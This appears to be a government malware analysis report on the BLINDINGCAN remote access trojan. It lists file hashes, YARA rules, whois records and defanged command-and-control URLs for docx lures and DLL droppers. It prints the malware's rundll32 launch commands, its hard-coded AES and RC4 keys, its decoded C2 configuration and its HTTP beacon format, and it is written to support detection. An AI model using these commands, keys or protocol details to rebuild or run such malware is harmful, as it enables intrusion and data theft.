OrgTechRef: https://rdap.arin.net/registry/entity/EIGAR-ARIN

Relationships

199.79.63.24
Resolved_To
agarwalpropertyconsultants.com

Description

Domain “agarwalpropertyconsultants.com” resolved to this Internet Protocol (IP) address during analysis.

158ddb85611b4784b6f5ca7181936b86eb0ec9a3c67562b1d57badd7b7ec2d17

Tags

downloaderloadertrojan

Details

Name
2_7955fa7ab32773d17e0e94efeea69cf4.e83cf8a6a4b24bd5d2b8ce4364d79fa8d4db6c6a.docx

Size
521644 bytes

Type
Microsoft Word 2007+

MD5
7955fa7ab32773d17e0e94efeea69cf4

SHA1
e83cf8a6a4b24bd5d2b8ce4364d79fa8d4db6c6a

SHA256
158ddb85611b4784b6f5ca7181936b86eb0ec9a3c67562b1d57badd7b7ec2d17

SHA512
aa773c54a764927c13db914169de9adde26210da8e223d54e206e9fa0b8720ded3d1fbfbbaf13d5cf40a46e1103f90889d6acb86b55515f01eec400a3de1e78d

ssdeep
12288:xnCB1YmAjh6oSdUocST5Uqpd4zRgE/CcftnPrqpd4zRgE/CcfI:tmA167dUo1FtpdSgEjlOpdSgEjA

Entropy
7.915680

Antivirus

McAfee
Trojan-FRVP!2F8066356BC3

NANOAV
Exploit.Xml.CVE-2017-0199.equmby

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

158ddb8561…
Connected_To
anca-aste.it

Description

This is a .docx file that is a zipped container of XML files in a directory structure.

Once opened in an application capable of displaying .docx files, the XML file “2_7955fa7ab32773d17e0e94efeea69cf4.e83cf8a6a4b24bd5d2b8ce4364d79fa8d4db6c6a.docx/word/_rels/settings.xml.rels” attempts to connect to the following URL for a download:

–Begin External URL–
hxxps[:]//www[.]anca-aste.it/uploads/form/boeing_iacm_logo.jpg
–End External URL–

The download was not available at the time of analysis.

Screenshots

Figure 2 – Screenshot of “2_7955fa7ab32773d17e0e94efeea69cf4.e83cf8a6a4b24bd5d2b8ce4364d79fa8d4db6c6a.docx”.

7933716892e0d6053057f5f2df0ccadf5b06dc739fea79ee533dd0cec98ca971

Tags

downloaderloadertrojan

Details

Name
3_56470e113479eacda081c2eeead153bf.c70edfaf2c33647d531f7df76cd4e5bb4e79ea2e.docx

Size
521660 bytes

Type
Microsoft Word 2007+

MD5
56470e113479eacda081c2eeead153bf

SHA1
c70edfaf2c33647d531f7df76cd4e5bb4e79ea2e

SHA256
7933716892e0d6053057f5f2df0ccadf5b06dc739fea79ee533dd0cec98ca971

SHA512
0111578f53189915a7f39f755087a283b60196283393d7979bc7a65f462c8af646579a57b0d4693bffdca0ceb92e2bad26720c4418b1cbb21ee2b216e7f763a5

ssdeep
12288:GaF6pLikGz2wx0zqb/RXkIUsYqpd4zRgE/CcfLqpd4zRgE/CcftKv:GaspLiewxgi/lkIUs5pdSgEj+pdSgEjG

Entropy
7.916144

Antivirus

Ahnlab
Downloader/Doc.Generic

Antiy
Trojan/Win32.Casdet

Avira
W97M/Dldr.Agent.iscqo

BitDefender
Trojan.GenericKD.33913186

ClamAV
Win.Malware.Agent-8366038-0

Comodo
Malware

Cyren
DOCX/Gamaredon.A.gen!Camelot

ESET
DOC/TrojanDownloader.Pterodo.A trojan

Emsisoft
Trojan.GenericKD.33913186 (B)

Ikarus
Trojan-Downloader.DOC.Agent

Lavasoft
Trojan.GenericKD.33913186

McAfee
Trojan-FRVP!AF83AD63D2E3

Microsoft Security Essentials
Trojan:Win32/Casdet!rfn

NANOAV
Exploit.Xml.CVE-2017-0199.equmby

NetGate
Trojan.Win32.Malware

Sophos
Troj/DocDl-ZFL

Symantec
Trojan.Gen.NPE

TrendMicro
Trojan.9A84BBAC

TrendMicro House Call
Trojan.9A84BBAC

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

7933716892…
Connected_To
anca-aste.it

Description

This is a .docx file that is a zipped container of XML files in a directory structure.

Once opened in an application capable of displaying .docx files, the XML file “3_56470e113479eacda081c2eeead153bf.c70edfaf2c33647d531f7df76cd4e5bb4e79ea2e.docx/word/_rels/settings.xml.rels” attempts to connect to the following URL for a download:

–Begin External URL–
hxxps[:]//www[.]anca-aste.it/uploads/form/boeing_spectrolab_logo.jpg
–End External URL–

The download was not available at the time of analysis.

Screenshots

Figure 3 – Screenshot of “3_56470e113479eacda081c2eeead153bf.c70edfaf2c33647d531f7df76cd4e5bb4e79ea2e.docx”.

6a3446b8a47f0ab4f536015218b22653fff8b18c595fbc5b0c09d857eba7c7a1

Tags

downloaderdropperloadertrojan

Details

Name
4_e7aa0237fc3db67a96ebd877806a2c88.0ecc687d741c7b009c648ef0de0a5d47213f37ff.docx

Size
184848 bytes

Type
Microsoft Word 2007+

MD5
e7aa0237fc3db67a96ebd877806a2c88

SHA1
0ecc687d741c7b009c648ef0de0a5d47213f37ff

SHA256
6a3446b8a47f0ab4f536015218b22653fff8b18c595fbc5b0c09d857eba7c7a1

SHA512
771f7e5f68a48e38361f7b1b3c8cc5181a456582515d9b694f98cacd7c33e06dfb994d082c3d009b432fb9f9ecd1f3b194e92b998c203e4e4fa7b93bf6711820

ssdeep
3072:3wlGjFU9aU5M3Dr+YLLUb6WaTllr+YLLUb6WaTlmv13fK8RZOphN:3wl9aUOfJnUjaTltJnUjaTlmv1y8RyN

Entropy
6.246580

Antivirus

Ahnlab
Downloader/MSOffice.Generic

Antiy
Trojan[Exploit]/MSOffice.CVE-2017-0199

Avira
W97M/Dldr.Agent.axzdz

ClamAV
Win.Malware.Agent-8366007-0

ESET
DOC/TrojanDownloader.Agent.BHQ trojan

Ikarus
Trojan-Downloader.DOC.Agent

McAfee
Trojan-FRVP!63178C414AF9

Microsoft Security Essentials
Exploit:O97M/CVE-2017-0199!MTB

NANOAV
Exploit.Xml.CVE-2017-0199.equmby

NetGate
Trojan.Win32.Malware

Sophos
Troj/DocDl-YVZ

Symantec
Trojan.Mdropper

TrendMicro
TROJ_FR.9B7AA4A0

TrendMicro House Call
TROJ_FR.9B7AA4A0

YARA Rules

No matches found.

ssdeep Matches

97
586d012540ed1244572906e3733a0cb4bba90a320da82f853e5dfac82c5c663e

Relationships

6a3446b8a4…
Connected_To
anca-aste.it

Description

This is a .docx file that is a zipped container of XML files in a directory structure.

Once opened in an application capable of displaying .docx files, one of its XML files (4_e7aa0237fc3db67a96ebd877806a2c88.0ecc687d741c7b009c648ef0de0a5d47213f37ff.docx/word/_rels/settings.xml.rels) connects to the following URL for a download.

–Begin External URL–
hxxps[:]//www[.]anca-aste.it/uploads/form/boeing_jd_t034519.jpg
–End External URL–

The download was not available at the time of analysis.

Screenshots

Figure 4 – Screenshot of “4_e7aa0237fc3db67a96ebd877806a2c88.0ecc687d741c7b009c648ef0de0a5d47213f37ff.docx”.

anca-aste.it

Tags

command-and-control

URLs

hxxps[:]//www[.]anca-aste.it/uploads/form/boeing_iacm_logo.jpg
hxxps[:]//www[.]anca-aste.it/uploads/form/boeing_jd_t034519.jpg
hxxps[:]//www[.]anca-aste.it/uploads/form/boeing_spectrolab_logo.jpg

Ports

443 TCP

Whois

Domain: anca-aste.it
Status: ok
Signed: no
Created: 2006-03-02 00:00:00
Last Update: 2019-07-22 01:05:20
Expire Date: 2020-07-06

Registrant
Created: 2017-07-05 14:28:22
Last Update: 2017-07-05 14:28:22

Admin Contact
Name: Gabriele Crepaldi
Organization: Gabriele Crepaldi
Address: Via Della Spiga 52, Milano, 20121, MI, IT
Created: 2017-07-05 14:28:22
Last Update: 2017-07-05 14:28:22

Technical Contacts
Name: hidden
Organization: hidden

Registrar
Organization: CWNET srl
Name: CWNET-REG
Web: http://www.cwnet.it
DNSSEC: no

Nameservers
ns.thetiscloud1.it
ns.thetiscloud2.it

Relationships

anca-aste.it
Resolved_To
51.68.152.96

anca-aste.it
Connected_From
6a3446b8a47f0ab4f536015218b22653fff8b18c595fbc5b0c09d857eba7c7a1

anca-aste.it
Connected_From
158ddb85611b4784b6f5ca7181936b86eb0ec9a3c67562b1d57badd7b7ec2d17

anca-aste.it
Connected_From
7933716892e0d6053057f5f2df0ccadf5b06dc739fea79ee533dd0cec98ca971

Description

Files “2_7955fa7ab32773d17e0e94efeea69cf4.e83cf8a6a4b24bd5d2b8ce4364d79fa8d4db6c6a.docx”,
“3_56470e113479eacda081c2eeead153bf.c70edfaf2c33647d531f7df76cd4e5bb4e79ea2e.docx” and
“4_e7aa0237fc3db67a96ebd877806a2c88.0ecc687d741c7b009c648ef0de0a5d47213f37ff.docx” attempt to connect to this domain.

51.68.152.96

Whois

Queried whois.ripe.net with “-B 51.68.152.96″…

% Information related to ‘51.68.152.0 – 51.68.155.255’

% Abuse contact for ‘51.68.152.0 – 51.68.155.255’ is ‘abuse@ovh.net’

inetnum:        51.68.152.0 – 51.68.155.255
netname:        SD-1G-WAW1-W13B
country:        PL
org:            ORG-OS23-RIPE
admin-c:        OTC12-RIPE
tech-c:         OTC12-RIPE
status:         LEGACY
mnt-by:         OVH-MNT
created:        2018-07-27T14:04:34Z
last-modified: 2018-07-31T15:24:23Z
source:         RIPE
geoloc:         52.225524 21.049737

organisation: ORG-OS23-RIPE
org-name:     OVH Sp. z o. o.
org-type:     OTHER
address:        ul. Swobodna 1
address:        50-088 Wroclaw
address:        Poland
e-mail:         noc@ovh.net
admin-c:        OTC2-RIPE
mnt-ref:        OVH-MNT
mnt-by:         OVH-MNT
created:        2005-09-02T12:40:01Z
last-modified: 2019-08-08T07:47:57Z
source:         RIPE

role:         OVH PL Technical Contact
address:        OVH Sp. z o. o.
address:        ul. Swobodna 1
address:        54-088 Wroclaw
address:        Poland
e-mail:         noc@ovh.net
admin-c:        OK217-RIPE
tech-c:         GM84-RIPE
nic-hdl:        OTC12-RIPE
abuse-mailbox: abuse@ovh.net
notify:         noc@ovh.net
mnt-by:         OVH-MNT
created:        2009-09-16T16:09:56Z
last-modified: 2019-08-08T07:50:01Z
source:         RIPE

% Information related to ‘51.68.0.0/16AS16276’

route:         51.68.0.0/16
origin:         AS16276
mnt-by:         OVH-MNT
created:        2018-03-07T09:22:39Z
last-modified: 2018-03-07T09:22:39Z
source:         RIPE

% This query was served by the RIPE Database Query Service version 1.97.2 (HEREFORD)

Relationships

51.68.152.96
Resolved_To
anca-aste.it

Description

Domain “anca-aste.it” resolved to this IP during analysis.

d40ad4cd39350d718e189adf45703eb3a3935a7cf8062c20c663bc14d28f78c9

Tags

droppertrojan

Details

Name
D40AD4CD39350D718E189ADF45703EB3A3935A7CF8062C20C663BC14D28F78C9

Size
724480 bytes

Type
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

MD5
18cfd7e01da5d30a27a885164d5a7b9b

SHA1
40c5103cd9681a2830667957f3e3d037fd25b6c9

SHA256
d40ad4cd39350d718e189adf45703eb3a3935a7cf8062c20c663bc14d28f78c9

SHA512
6724ed963fa7ffd1cb3b76a72890b385bcd080a66428f18531f1432a973896d98e9405bd02952ae81b4a6d6294a73cde5911e9998e4f9dae53a2a385ab78e036

ssdeep
12288:u4VYMsRKftZAli/I9j2OShndRYMaU4vdXScW2EmBYWK323b1zvpjUSqon01y:jwKbA9XSJ4i4vdEGYfahBjk5

Entropy
7.960508

Antivirus

BitDefender
Gen:Trojan.Heur.Su4@!RdqOMbi

Emsisoft
Gen:Trojan.Heur.Su4@!RdqOMbi (B)

Lavasoft
Gen:Trojan.Heur.Su4@!RdqOMbi

Symantec
Heur.AdvML.B

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2020-05-20 02:03:53-04:00

Import Hash
513e6f9be441b608d02560144adad488

PE Sections

MD5
Name
Raw Size
Entropy

6dead31f52ae9c89182635c7bc5363ff
header
1024
2.447679

4eb9a889d49c201486c6a9844c0a3861
.text
28160
6.512256

2564f80bde6880569bc81d572ffd85c6
.rdata
9216
4.772079

4f06d9f35e1f31817d4205f0cda45316
.data
680448
7.992807

aedd1ea7e39bc6c20eb7c1a31ee31945
.rsrc
512
5.114293

4de4bb5980c9ffde6d9809bca8589667
.reloc
5120
3.162603

Packers/Compilers/Cryptors

Microsoft Visual C++ DLL *sign by CodeRipper

Relationships

d40ad4cd39…
Dropped
b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9

Description

This application is a 32-bit DLL. Upon execution, it decodes an embedded Ultimate Packer for Executables (UPX) packed DLL using a hard-coded XOR key: “0x59”. The decoded DLL is installed and executed from “C:ProgramDataiconcache.db” (b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9) with the following command:

–Begin Command–
“C:WindowsSystem32rundll32.exe C:ProgramDataiconcache.db,SMain S-6-12-2371-68143633-837395-7851″
–End Command–

b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9

Tags

obfuscatedremote-access-trojan

Details

Name
iconcache.db

Size
676864 bytes

Type
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed

MD5
c627db421adaaa320d3ac42396c89f8a

SHA1
dcf95cd96203e794724fc14e454e63fba9afe82a

SHA256
b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9

SHA512
bcc0a6688b5a282802700382d72e11663015946a95c701df82fdab164b6ef6889e180617a284e604e931ffc046ec1fd20ac6e20357ec916bada7df4711800290

ssdeep
12288:UloPYtyI4lSa/gwZyVJKlI/mjGENKw4tv1ALs7wboS:eoQp4lSWgwZy6lUkh4N2Ls7w

Entropy
7.994989

Path
C:ProgramDataiconcache.db

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2019-10-30 22:22:32-04:00

Import Hash
bddf350b1495019b036eb25682895735

Company Name
TODO: <Company name>

File Description
TODO: <File description>

Internal Name
MFC_DLL.dll

Legal Copyright
TODO: (c) <Company name>. All rights reserved.

Original Filename
MFC_DLL.dll

Product Name
TODO: <Product name>

Product Version
1.0.0.1

PE Sections

MD5
Name
Raw Size
Entropy

ee27480742e19dfbbedf334ca52aafa5
header
1024
2.713911

d41d8cd98f00b204e9800998ecf8427e
UPX0
0
0.000000

f13bc7e5f532956e1c5490d27d9b9eb0
UPX1
670720
7.999480

80eb6e1fc17919b7444d34b73621166f
.rsrc
5120
3.981460

Packers/Compilers/Cryptors

ACProtect 1.3x – 1.4x DLL -> Risco Software Inc.

Relationships

b70e66d387…
Connected_To
curiofirenze.com

b70e66d387…
Connected_To
automercado.co.cr

b70e66d387…
Dropped_By
d40ad4cd39350d718e189adf45703eb3a3935a7cf8062c20c663bc14d28f78c9

b70e66d387…
Contains
bdfd16dc53f5c63da0b68df71c6e61bad300e59fd5748991a6b6a3650f01f9a1

b70e66d387…
Contains
7d507281e2e21476ff1af492ad9f574b14cbf77eb4cda9b67e4256318c7c6bbd

Description

This application is a 32-bit UPX packed DLL installed by d40ad4cd39350d718e189adf45703eb3a3935a7cf8062c20c663bc14d28f78c9 into the C:ProgramDataiconcache.db” directory. During execution, it uses the Advanced Encryption Standard (AES) cipher to decrypt and then decompress two embedded DLL binaries “bdfd16dc53f5c63da0b68df71c6e61bad300e59fd5748991a6b6a3650f01f9a1” and “7d507281e2e21476ff1af492ad9f574b14cbf77eb4cda9b67e4256318c7c6bbd” in memory. These binaries are loaded and executed in memory during runtime.

bdfd16dc53f5c63da0b68df71c6e61bad300e59fd5748991a6b6a3650f01f9a1

Tags

backdoorremote-access-trojantrojan

Details

Name
e7718609577c6e34221b03de7e959a8c

Size
163840 bytes

Type
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

MD5
e7718609577c6e34221b03de7e959a8c

SHA1
97d24ac0d773f6260ab512fa496099b3289210db

SHA256
bdfd16dc53f5c63da0b68df71c6e61bad300e59fd5748991a6b6a3650f01f9a1

SHA512
95aab6ef454c364b63002df7949c33602964d0905b4a23511bd9462aa5037c71a933f8bf3a3d650be76926e92bcf39e362a047c2da3da727096d16c1187e0308

ssdeep
1536:/XhDZIPNWfFTIL1uWPgNquuGCoGSfYz57wmF87GbSaW1nqBQlBS4AF3TIhrim:/xwWmBLPgNZeTSfE5UmfQqT3TIhW

Entropy
5.585632

Antivirus

Ahnlab
Backdoor/Win32.Akdoor

ESET
a variant of Win32/NukeSped.GT trojan

Symantec
Heur.AdvML.B

YARA Rules

rule CISA_10135536_06 : trojan rat HIDDENCOBRA BLINDINGCAN
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10135536”
       Date = “2018-05-04”
       Actor = “HiddenCobra”
       Category = “Trojan RAT”
       Family = “BLINDINGCAN”
       Description = “Detects 32bit HiddenCobra BLINDINGCAN Trojan RAT”
       MD5_1 = “f9e6c35dbb62101498ec755152a8a67b”
       SHA256_1 = “1ee75106a9113b116c54e7a5954950065b809e0bb4dd0a91dc76f778508c7954”
       MD5_2 = “d742ba8cf5b24affdf77bc6869da0dc5”
       SHA256_2 = “7dce6f30e974ed97a3ed024d4c62350f9396310603e185a753b63a1f9a2d5799”
       MD5_3 = “aefcd8e98a231bccbc9b2c6d578fc8f3”
       SHA256_3 = “96721e13bae587c75618566111675dec2d61f9f5d16e173e69bb42ad7cb2dd8a”
       MD5_4 = “3a6b48871abbf2a1ce4c89b08bc0b7d8”
       SHA256_4 = “f71d67659baf0569143874d5d1c5a4d655c7d296b2e86be1b8f931c2335c0cd3”
   strings:
       $s0 = { C7 45 EC 0D 06 09 2A C7 45 F0 86 48 86 F7 C7 45 F4 0D 01 01 01 C7 45 F8 05 00 03 82 }
       $s1 = { 50 4D 53 2A 2E 74 6D 70 }
       $s2 = { 79 67 60 3C 77 F9 BA 77 7A 56 1B 68 51 26 11 96 B7 98 71 39 82 B0 81 78 }
   condition:
       any of them
}
rule CISA_10295134_01 : rat trojan HIDDENCOBRA BLINDINGCAN
{
   meta:
       Author = “CISA Code & Media Analysis”
       Incident = “10295134”
       Date = “2020-07-28”
       Last_Modified = “20200730_1030”
       Actor = “HiddenCobra”
       Category = “Trojan RAT”
       Family = “BLINDINGCAN”
       Description = “Detects 32 and 64bit HiddenCobra BlindingCan Trojan RAT”
       MD5_1 = “e7718609577c6e34221b03de7e959a8c”
       SHA256_1 = “bdfd16dc53f5c63da0b68df71c6e61bad300e59fd5748991a6b6a3650f01f9a1”
       MD5_2 = “6c2d15114ebdd910a336b6b147512a74”
       SHA256_2 = “58027c80c6502327863ddca28c31d352e5707f5903340b9e6ccc0997fcb9631d”
   strings:
       $s0 = { C7 44 24 20 0D 06 09 2A C7 44 24 24 86 48 86 F7 C7 44 24 28 0D 01 01 01 C7 44 24 2C 05 00 03 82 }
       $s1 = { C7 45 EC 0D 06 09 2A C7 45 F0 86 48 86 F7 C7 45 F4 0D 01 01 01 C7 45 F8 05 00 03 82 }
   condition:
       $s0 or $s1
}

ssdeep Matches

93
5665fa000b3cd52ceae755d35ca698e50cfb9c952cfdc70610b3a262e87be210

PE Metadata

Compile Date
2020-05-19 03:26:30-04:00

Import Hash
920679e3a916eba5c0309f6381f49d76

PE Sections

MD5
Name
Raw Size
Entropy

3c4d32746197a23e043dec30c3f17502
header
1024
2.462178

c7b7bc3bf34654bd45c303561f9359e1
.text
81920
6.658611

a0605f0296280e16d350cf78eb70a0d3
.rdata
25088
6.630270

88750685639a22c3e4bcb15f40390ff9
.data
12800
3.648302

51741feb8529e34f47173f59abe8b19b
.rsrc
512
5.105616

b87183316e04b075a0da8e286b297fdb
.reloc
7680
5.057386

Packers/Compilers/Cryptors

Microsoft Visual C++ DLL *sign by CodeRipper

Relationships

bdfd16dc53…
Contained_Within
b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9

bdfd16dc53…
Connected_To
curiofirenze.com

bdfd16dc53…
Connected_To
automercado.co.cr

Description

This application is a malicious 32-bit DLL unpacked and executed by “b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9”. This binary has been identified as a variant of a Hidden Cobra RAT. This file contains embedded configuration data (2704 bytes). The data is decrypted using a hard-coded AES decryption key “XEUFC1L3DF3C2ROU” before being decoded using an XOR cipher. Displayed below is the content of the decoded data:

–Begin configuration data–
hxxps[:]//www[.]automercado.co.cr/empleo/css/main.jsp
hxxps[:]//www[.]automercado.co.cr/empleo/css/main.jsp
hxxps[:]//www[.]automercado.co.cr/empleo/css/main.jsp
hxxps[:]//www[.]curiofirenze.com/include/inc-site.asp
hxxps[:]//www[.]curiofirenze.com/include/inc-site.asp
c:windowssystem32cmd.exe
%temp%
–End configuration data–

The malware decrypts its strings using a hard-coded RC4 key: “0D 06 09 2A 86 48 86 F7 0D 01 01 01 05 00 03 82”. Displayed below are sample decrypted strings observed during analysis:

–Begin decrypted strings–
“HardwareDescriptionSystemCentralProcessor”
“ProcessorNameString”
“boardid, bbsNo, strBoardID, userid, bbsfilename, code, pidseqNo, ReportID, v, PageNumbernumviewread, action, pagemodeidx, cateId, bbsId, pType, pcode, index, tblidx_num, act, bbs_id, bbs_form, bidbbscate, menutcode, b_code, bname, tb, borad01, borad02, borad03, midnewsid, table, Board_seq, bc_idx, seqArticleIDB_Notice, nowPage, webid, boardDiv, sub_idx”
“\tsclient”
–End decrypted strings–

It collects the following information about the victim’s system and beacons the collected data to the C2 “curiofirenze.com” and
“automercado.co.cr”:

–Begin system information–
Operating system (OS) version information
Processor information
System name
Local IP address information
Media access control (MAC) address.
–End system information–

It attempts to retrieve the User-Agent string from the victim’s system. If not available, it uses the following embedded User-Agent string:

–Begin User-Agent String–
“Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36″ .
–End User-Agent String–

It will generate HTTP POST requests with the following format:

–Begin HTTP POST format–
POST /<uri> HTTP/1.1
Connection: Keep-Alive
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: <obtained from ObtainUserAgentString otherwise: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 >
Host: <domain>
Content-Length: <length>

id=<nine random character generated RC4 key><three_random_param_selected>&<second parameter>=<sessionID>&<third parameter >=<hard-coded_String>&<fourth parameter>=<datagram>
–End HTTP POST format–

The HTTP POST body contains four parameters of Base64 encoded data as displayed below:

–Begin four parameters–
Four parameters: id=<nine random character generated RC4 key><three_random_param_selected>&<second parameter>=<sessionID>&<third parameter >=<hard-coded_String>&<fourth parameter>=<datagram>

Sample: id=Z2ptZmx0b250JpzkM7R+AAxesq7t1Eo4Dg==&page=bsyybw==&bbsNo=AszBYcolV00l69W9ihtkLg==&bname=”
–End four parameters–

The first parameter tag, ‘id=’, will consist of two separate Base64 encoded parts. The first part consists of a Base64 encoded nine random generated lower case character RC4 key used for encryption. The second part of the ‘id=’ parameter tag will contain three parameters randomly selected from a list of the below strings. These three randomly selected name tags are colon delimited and stored in the following format:”first name tag:second name tag:third name tag”. This data is encrypted using the nine random character generated RC4 key and Base64 encoded.

–Begin randomly selected string tags–
“boardid, bbsNo, strBoardID, userid, bbsfilename, code, pidseqNo, ReportID, v, PageNumbernumviewread, action, pagemodeidx, cateId, bbsId, pType, pcode, index, tblidx_num, act, bbs_id, bbs_form, bidbbscate, menutcode, b_code, bname, tb, borad01, borad02, borad03, midnewsid, table, Board_seq, bc_idx, seqArticleIDB_Notice, nowPage, webid, boardDiv, sub_idx”
–End randomly selected string tags–

The second parameter tag ‘page=’ is a randomly selected name from the list of the above string tags which contains the “session id” data. This data is encrypted using the same generated RC4 key before Base64 encoded.

The third parameter tag ‘bbsNo=’ is a randomly selected name from a list of the above string tags which contains a hard-coded string data “T1B7D95256A2001E” in the malware. This data is encrypted using the RC4 key and then the data is Base64 encoded. Analysis indicates that when encrypting data from the first three parameters, the encryption starts “0xC00 bytes” into the RC4 key stream.

The fourth parameter tag ‘bname=’ is a randomly selected name from the list of the above string tags which contains the datagram to be sent. The datagram is encrypted with a combination of RC4 and differential XOR. The RC4 key used is “0D 06 09 2A 86 48 86 F7 0D 01 01 01 05 00 03 82”.

It contains the following built-in functions for remote operations that provide various capabilities on a victim’s system:

–Begin built-in functions–
Retrieve information about all installed disks, including the disk type and the amount of free space on the disk
Create, start, and terminate a new process and its primary thread
Search, read, write, move, and execute files
Get and modify file or directory timestamps
Change the current directory for a process or file
Delete malware and artifacts associated with the malware from the infected system
–End built-in functions–

7d507281e2e21476ff1af492ad9f574b14cbf77eb4cda9b67e4256318c7c6bbd

Tags

HIDDEN-COBRA

Details

Name
7d507281e2e21476ff1af492ad9f574b14cbf77eb4cda9b67e4256318c7c6bbd

Size
163840 bytes

Type
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

MD5
6f329c32f228d9a4d856afd4794c7f2b

SHA1
4be9aecc0fc76c037420ece97645c6a32294a230

SHA256
7d507281e2e21476ff1af492ad9f574b14cbf77eb4cda9b67e4256318c7c6bbd

SHA512
f4aff0e36fb98d64ff207a983ca7ed10c11ad7b01953b545c655a3349016f9d6c5fbd3cc8d44851cb68c51f069da2469b1e3445cd60b6e1365375402ad671160

ssdeep
384:vNV+PKlwRYnd2dPugCkPV59FYRz8xM6hwXlbfR+1nu6EDH+zj+1XoNC3vyFAt1:vNIKip92x8rhOdmnTEDwu3vy

Entropy
1.605796

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2019-10-30 22:21:48-04:00

Import Hash
75588d29242e426f361ddcf8c53954f5

PE Sections

MD5
Name
Raw Size
Entropy

0452202027da519acb3a7d074696de07
header
1024
2.351340

ae1c3feb6a3beda4db0ce8c794af77e7
.text
17920
6.473020

c139714dd00b81eb08ecaf32bdced254
.rdata
8192
4.655148

0685a556cdaa359c306b3c7830fc6f1e
.data
3072
2.403876

a2b361aa5b6f2d5912845d84ca96a368
.rsrc
512
5.105029

d2e652e58f57bd6314d5ebf8f59687e9
.reloc
2048
5.497034

Packers/Compilers/Cryptors

Microsoft Visual C++ DLL *sign by CodeRipper

Relationships

7d507281e2…
Contained_Within
b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9

Description

This application is a 32-bit DLL unpacked and executed by “b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9”. This file is designed to unmap the DLL “C:ProgramDataiconcache.db” loaded in the process.

0fc12e03ee93d19003b2dd7117a66a3da03bd6177ac6eb396ed52a40be913db6

Tags

downloaderdropper

Details

Name
0FC12E03EE93D19003B2DD7117A66A3DA03BD6177AC6EB396ED52A40BE913DB6

Size
900096 bytes

Type
PE32+ executable (DLL) (GUI) x86-64, for MS Windows

MD5
b1dd2c73b3c13a147828f7bb4389d241

SHA1
5275449d25a64e7415c1c1e727a0af76b08c2811

SHA256
0fc12e03ee93d19003b2dd7117a66a3da03bd6177ac6eb396ed52a40be913db6

SHA512
054b8c4345e97aa4719415971cb5df83f208a2c11302baba66392251a5d7d8251e564443fd4716d82cacf2a5da94250cc8defd9300e0885034c471a07cdc5510

ssdeep
12288:sXcnHdDS0zaEw2W912s3xN+JgHGJNfKAyhnB8EoarWY9ZtvaBmBJnLoAFMx8wIWF:sMH9S8avT2Ex5mJNfbyYBaaY9Ly8qK

Entropy
7.961146

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2020-05-20 02:03:51-04:00

Import Hash
65793cf7eaeca085293db7251eb4469a

PE Sections

MD5
Name
Raw Size
Entropy

a1c37a2c9fedecabe570383d81bfb5d6
header
1024
2.524544

61e11f8acaaf9d065546a237ced1e964
.text
31744
6.348358

9f1fe9ee707daa61e91ad94d618b066f
.rdata
11264
4.687720

300ac7ec543fda0fab22c110a7d26281
.data
850432
7.993358

da2a58c7e17c14ced8b67bc462ad7427
.pdata
2048
4.219318

531f04a4abeb58f9e10fffc6afe98250
.rsrc
512
5.110827

58c4168b836758e380e64f12eca00760
.reloc
3072
1.006647

Relationships

0fc12e03ee…
Dropped
d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5

Description

This application is a 64-bit DLL. Upon execution, it decodes an embedded 64-bit UPX packed DLL using a hard-coded XOR key: “0x59”. The decoded DLL is installed and executed from “C:ProgramDataiconcache.db” (d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5) with the following command:

–Begin Command–
“C:WindowsSystem32rundll32.exe C:ProgramDataiconcache.db,SMain S-7-43-8423-97048307-383378-8483”
–End Command–

d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5

Tags

obfuscatedremote-access-trojan

Details

Name
iconcache.db

Size
845312 bytes

Type
PE32+ executable (DLL) (GUI) x86-64, for MS Windows

MD5
c2c5751cdfdbe9fac44337d4cb6e74e4

SHA1
02678efe715ff2658c6a4c2b596046b744a8b222

SHA256
d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5

SHA512
dddd82c21ee815a570689c8023f51267a2699346eadb8cf5cb6a2bfc4e0404ab8388608e934c03b8b69819bab1b5252ed8b29391f543a1c1e8aeb83360e5f4d2

ssdeep
24576:aSiVfP99Z7QI32TVKBixBWfSVz5HlWkZtk:aSMH94/TVKsfGc9Iqt

Entropy
7.996450

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2019-10-30 22:22:27-04:00

Import Hash
bddf350b1495019b036eb25682895735

Company Name
TODO: <Company name>

File Description
TODO: <File description>

Internal Name
MFC_DLL.dll

Legal Copyright
TODO: (c) <Company name>. All rights reserved.

Original Filename
MFC_DLL.dll

Product Name
TODO: <Product name>

Product Version
1.0.0.1

PE Sections

MD5
Name
Raw Size
Entropy

bbdf7f1c6cfdab4beb23ae1f5e5e8e3f
header
1024
2.753386

d41d8cd98f00b204e9800998ecf8427e
UPX0
0
0.000000

